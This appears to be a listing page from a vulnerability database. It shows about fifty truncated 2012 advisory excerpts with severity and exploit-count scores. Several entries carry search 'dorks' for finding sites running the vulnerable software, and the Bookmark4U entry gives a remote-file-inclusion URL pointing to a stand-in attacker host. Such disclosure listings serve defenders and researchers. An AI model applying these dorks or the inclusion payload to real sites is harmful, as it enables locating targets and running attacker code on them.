
47153 matches found

securityvulns
added 2012/07/11 12:00 a.m., 25 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS 7.5, AI score 1.6, EPSS 0.38624
Exploits 4, References 10, Affected software 4
securityvulns
added 2012/07/11 12:00 a.m., 70 views

Arasism Remote Command Upload Vulnerability

Exploit Title : Arasism Remote Command Upload Vulnerability Author : Iranian Security & Research Team Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.Arasism.Com Security Risk : High DorK : "Powered by Arasism.com"...

AI score 0.6
Exploits 0
securityvulns
added 2012/07/11 12:00 a.m., 86 views

BookNux 0.2 <= Multiple Vulnerabilities

BookNux 0.2 <= Multiple Vulnerabilities Discovered by: Jean Pascal Pereira [email protected] Vendor information: "Commentics is a free, advanced PHP comment script with many features. Professionally written and with open source code, its main aims are to be integrable, customizable and secure."...

AI score 1
Exploits 0
securityvulns
added 2012/07/11 12:00 a.m., 100 views

PHP NUKE ALL VERSION MULTI VULNERABILITY

Exploit Title : PHP NUKE ALL VERSION MULTI VULNERABILITY Author : Iranian Security & Research Team Discovered By : Nafsh Home : sec-lab.ir Contact : research at sec-lab dot ir Date : 23/1/2012 - 19:30 Software Link : www.phpnuke.ir Security Risk : High...

AI score 1
Exploits 0
securityvulns
added 2012/07/11 12:00 a.m., 100 views

Behsamanco CMS Editor Vulnerability

Exploit Title : Behsamanco CMS Editor Vulnerability Author : Iranian Security & Research Team Discovered By : R3dMind Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.behsamanco.com Security Risk : high Dork : inurl:".ir/Controls/TextEditor/"...

Exploits 0
securityvulns
added 2012/07/11 12:00 a.m., 35 views

libpurple / Pidgin code execution

Code execution in MXit protocol...

CVSS 7.5, AI score 2.5, EPSS 0.04706
Exploits 2, References 1, Affected software 1
securityvulns
added 2012/07/11 12:00 a.m., 49 views

[SECURITY] [DSA 2509-1] pidgin security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2509-1 [email protected] http://www.debian.org/security/ Luciano Bello July 08, 2012 http://www.debian.org/security/faq -...

CVSS 7.5, AI score 2.4, EPSS 0.04706
Exploits 2
securityvulns
added 2012/07/11 12:00 a.m., 83 views

NDTV Cross Site Scripting Vulnerability

Exploit Title : NDTV Cross Site Scripting Vulnerability Author : Iranian Security & Research Team Discovered By : zilli0o0n Home : sec-lab.ir Contact : research at sec-lab dot ir Software Link : www.ndtv.com DorK : "Copyright NDTV Convergence Limited 2012"...

AI score 0.9
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 28 views

Cyberoam DPI unsafe certificates

All devices use same certificates for SSL connection hijacking...

AI score 2.3
Exploits 0, References 1
securityvulns
added 2012/07/09 12:00 a.m., 98 views

NGS00162 Patch Notification: Symantec Message Filter Session Hijacking via session fixation

High Risk Vulnerability in Symantec Message Filter 2 July 2012 Ben Williams of NCC Group has discovered a High risk vulnerability in Symantec Message Filter Impact: Session Hijacking via session fixation Versions affected: Symantec Message Filter Version 6.3 An updated version of the software has...

AI score 1.2
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 43 views

ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ZDI-12-106 : Avaya IP Office Customer Call Reporter ImageUpload Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-106 June 28, 2012 - -- CVE ID: CVE-2012-3811 - -- CVSS: 9.7, AV:N/AC:L/Au:N/C:C/I:C/A:P - --...

CVSS 10, AI score 0.5, EPSS 0.79047
Exploits 8
securityvulns
added 2012/07/09 12:00 a.m., 29 views

Ubuntu AccountsService privilege escalation

Invalid files caching...

CVSS 1.9, AI score 4.1, EPSS 0.00071
Exploits 1, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 141 views

[SECURITY] [DSA 2504-1] libspring-2.5-java security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2504-1 [email protected] http://www.debian.org/security/ Florian Weimer June 28, 2012 http://www.debian.org/security/faq -...

CVSS 7.5, AI score 1, EPSS 0.47611
Exploits 1
securityvulns
added 2012/07/09 12:00 a.m., 26 views

Symantec Message Filter session hijacking

No description provided...

AI score 1.5
Exploits 0, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 39 views

Microsoft IIS security vulnerabilities

A flood of requests with the ~ sign in the path leads to server DoS; files and folders are accessible via their 8.3 names, making it easier to brute-force the names of hidden files and folders...

AI score 2.8
Exploits 0, References 2
securityvulns
added 2012/07/09 12:00 a.m., 219 views

REWTERZ-20120629 - TEMENOS T24 Cross-Site Scripting (XSS) Vulnerability

Rewterz Security Research Group Advisory ======================================================== I. Overview ======================================================== A Cross-Site Scripting XSS vulnerability has been identified in TEMENOS T24 Core Banking Solution System. This vulnerability allow...

AI score 0.3
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 60 views

[SECURITY] [DSA 2503-1] bcfg2 security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2503-1 [email protected] http://www.debian.org/security/ Florian Weimer June 28, 2012 http://www.debian.org/security/faq -...

CVSS 9, AI score 2.3, EPSS 0.01624
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 48 views

.Net Framework Tilde Character DoS - Sorry, exploit-db link corrected

Link: http://soroush.secproject.com/downloadable/iistildedos.txt Exploit-db link: www.exploit-db.com/exploits/19575 ---------------------------- Security Research - .Net Framework Tilde Character DoS Website : http://soroush.secproject.com/blog/ I. BACKGROUND --------------------- "The .NET...

AI score 0.1
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 47 views

Spring Framework information leakage

No description provided...

CVSS 7.5, AI score 1.7, EPSS 0.47611
Exploits 1, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 69 views

Event Script PHP v1.1 CMS - Multiple Web Vulnerabilities

Title: ====== Event Script PHP v1.1 CMS - Multiple Web Vulnerabilities Date: ===== 2012-06-10 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=606 VL-ID: ===== 606 Common Vulnerability Scoring System: ==================================== 7 Introduction: ============= Even...

AI score 0.3
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 29 views

Avaya IP Office Customer Call Reporter code execution

It's possible to upload executable files via ImageUpload.ashx...

CVSS 10, AI score 3.4, EPSS 0.79047
Exploits 8, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 54 views

Linux kernel multiple security vulnerabilities

DoS, privilege escalation...

CVSS 7.2, AI score 2.7, EPSS 0.00457
Exploits 6, References 2, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 65 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian Security & Research Lab Discovered By : K0242 Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

AI score 1.6
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 76 views

[CVE-2012-0694] SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution

------------------------------------------------------- SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution ------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13satgmaildotcom software link....: http://www.sugarcrm.com/ -...

AI score 1.2, EPSS 0.83794
Exploits 13
securityvulns
added 2012/07/09 12:00 a.m., 64 views

[USN-1488-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1488-1 June 29, 2012 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

CVSS 7.2, AI score 0.2, EPSS 0.00457
Exploits 5
securityvulns
added 2012/07/09 12:00 a.m., 66 views

[USN-1473-1] Linux kernel vulnerabilities

========================================================================== Ubuntu Security Notice USN-1473-1 June 13, 2012 linux vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubun...

CVSS 7.2, AI score 0.7, EPSS 0.00173
Exploits 4
securityvulns
added 2012/07/09 12:00 a.m., 55 views

[ MDVSA-2012:101 ] libtiff

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2012:101 http://www.mandriva.com/security/ Package : libtiff Date : July 4, 2012 Affected: 2010.1, 2011., Enterprise Server 5.0 Problem Description: Multiple vulnerabilities have been discovered and corrected in...

CVSS 7.5, AI score 7.8, EPSS 0.02978
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 59 views

libtiff library integer overflow

Integer overflow on tiff parsing...

CVSS 7.5, AI score 5.3, EPSS 0.06846
Exploits 0, References 2, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 61 views

CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability

Severity: important Vendor: The Apache Software Foundation Versions Affected: Roller 4.0.0 to Roller 4.0.1 Roller 5.0 The unsupported Roller 3.1 release is also affected Description: HTTP POST interfaces in the Roller admin/editor console were not protected from CSRF attacks. This issue has been...

AI score 0.2, EPSS 0.00249
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 133 views

Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI

vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://attacker/path/to/file.txt???...

AI score 1
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 10745 views

GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilities

Title: ====== GuestBook Scripts PHP v1.5 - Multiple Web Vulnerabilities Date: ===== 2012-06-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=601 VL-ID: ===== 601 Common Vulnerability Scoring System: ==================================== 7.5 Introduction: =============...

AI score 0.1
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 39 views

XSS, Redirector and FPD vulnerabilities in WordPress

Hello 3APA3A! In June I disclosed vulnerabilities in WordPress, which I'd like to present to you. They take place in the plugin Akismet for WordPress, which has been its core plugin since version WP 2.0, so these vulnerabilities concern WordPress itself. This is the first in a series of advisories concerning...

AI score 0.7
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 115 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian Security & Research Team Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

AI score 1.4
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 96 views

Wordpress (editormonkey) Arbitrary File Upload Vulnerability

A bug in WordPress editormonkey that allows us to perform a file upload on a remote machine. Exploit Title : Wordpress editormonkey Arbitrary File Upload Vulnerability Author : IrIsT.Ir Discovered By : Am!r Home : http://IrIsT.Ir/forum Software Link : http://wordpress.org Security Risk : High...

AI score 1.4
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 49 views

Cyberoam advisory

Vulnerability in Cyberoam DPI devices 30 Jun 2012 CVE-2012-3372 =================================================================== Cyberoam makes a range of DPI devices http://www.cyberoamworks.com/ which are capable of intercepting SSL connections. In common with all such devices, in order to...

CVSS 5.8, AI score 0.5, EPSS 0.00084
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 19 views

EMC RSA Access Manager replay attack

It's possible to replay a sniffed session...

AI score 4.6
Exploits 0, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 81 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS 7.5, AI score 1.6, EPSS 0.83794
Exploits 31, References 26, Affected software 14
securityvulns
added 2012/07/09 12:00 a.m., 51 views

IBM Edge Components Caching Proxy XSS Followup

Rapid7 probably found this vulnerability on October 23, 2002 http://seclists.org/fulldisclosure/2002/Oct/330 and it's called CVE-2002-1167. They don't show the output and specify it is an error message, but the injection method is the same. The update is that it works on IBM Edge Components Caching Proxy -...

Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 49 views

[security bulletin] HPSBPI02794 SSRT100542 rev.1 - Certain HP Photosmart Printers, Remote Denial of Service (DoS)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emrna-c02931414 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02931414 Version: 1 HPSBPI02794...

CVSS 7.8, AI score 0.3, EPSS 0.04621
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 29 views

IBM Edge Components Caching Proxy cross-site scripting

Cross-site scripting on a non-existent page...

CVSS 6.8, AI score 1.7, EPSS 0.04408
Exploits 0, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 96 views

7sepehr SQL Injection Vulnerability

Exploit Title : 7sepehr SQL Injection Vulnerability Author : Iranian security & Research Lab Discovered By : Ehram.shahmohamadi Home : sec-lab.ir Contact : research at sec-lab dot ir Portal Link : www.7sepehr.Com Security Risk : High DorK : "Powered by 7sepehr.com"...

AI score 1.6
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 61 views

NGS00194 Patch Notification: Nagios XI Network Monitor Blind SQL Injection

High Risk Vulnerability in Nagios XI Network Monitor 2 July 2012 Daniel Compton of NCC Group has discovered a High risk vulnerability in Nagios XI Network Monitor Impact: Nagios XI Network Monitor Blind SQL Injection Versions affected: Nagios XI Network Monitor 2011R1.9 An updated version of the...

AI score 0.5
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 65 views

SEC Consult SA-20120626-0 :: Zend Framework - Local file disclosure via XXE injection

SEC Consult Vulnerability Lab Security Advisory 20120626-0 ======================================================================= title: Local file disclosure via XXE injection product: Zend Framework vulnerable version: 1.11.11 1.12.0 RC1 2.0.0 beta4 and earlier versions / branches fixed versio...

AI score 7.6
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 82 views

[SECURITY] [DSA 2506-1] libapache-mod-security security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2506-1 [email protected] http://www.debian.org/security/ Yves-Alexis Perez July 02, 2012 http://www.debian.org/security/faq -...

CVSS 4.3, AI score 1.9, EPSS 0.01943
Exploits 2
securityvulns
added 2012/07/09 12:00 a.m., 35 views

ESA-2012-026: RSA Access Manager Session Replay Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-026: RSA Access Manager Session Replay Vulnerability EMC Identifier: ESA-2012-026 CVE Identifier: CVE-2012-2281 Severity Rating: CVSSv2 Base Score: 6.8 AV:A/AC:H/Au:N/C:C/I:C/A:C Affected Products: RSA Access Manager Server version 6.0.x RSA...

CVSS 6.8, AI score 0.2, EPSS 0.00326
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 64 views

Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities

Title: ====== Freeside SelfService CGI|API 2.3.3 - Multiple Vulnerabilities Date: ===== 2012-06-14 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=614 VL-ID: ===== 614 Common Vulnerability Scoring System: ==================================== 6.5 Introduction:...

AI score 0.3
Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 336 views

IIS Short File/Folder Name Disclosure by using tilde ~ character

Link: http://soroush.secproject.com/downloadable/iistildeshortnamedisclosure.txt Exploit-db link: www.exploit-db.com/exploits/19525/ ---------------------------- Security Research - IIS Short File/Folder Name Disclosure Website : http://soroush.secproject.com/blog/ I. BACKGROUND...

Exploits 0
securityvulns
added 2012/07/09 12:00 a.m., 37 views

HP Device Access Manager for Protect Tools Information Store ActiveX memory corruption

Buffer overflows in different methods...

CVSS 7.5, AI score 4.2, EPSS 0.41759
Exploits 1, References 3, Affected software 2
securityvulns
added 2012/07/09 12:00 a.m., 60 views

Apache mod_security protection bypass

It's possible to bypass protection if both Content-Disposition: attachment and Content-Type: multipart are present...

CVSS 5, AI score 2, EPSS 0.11456
Exploits 3, References 1, Affected software 1
securityvulns
added 2012/07/09 12:00 a.m., 48 views

Basilic RCE bug

Hi Dear Sir, Basilic is an Automated Bibliography Server for Research Publications Diffusion that is used by many research centers. There is an RCE bug in basilic/Config/diff.php that could allow an attacker to run system commands on the server. Sample:...

AI score 0.9
Exploits 0
Total number of security vulnerabilities: 47153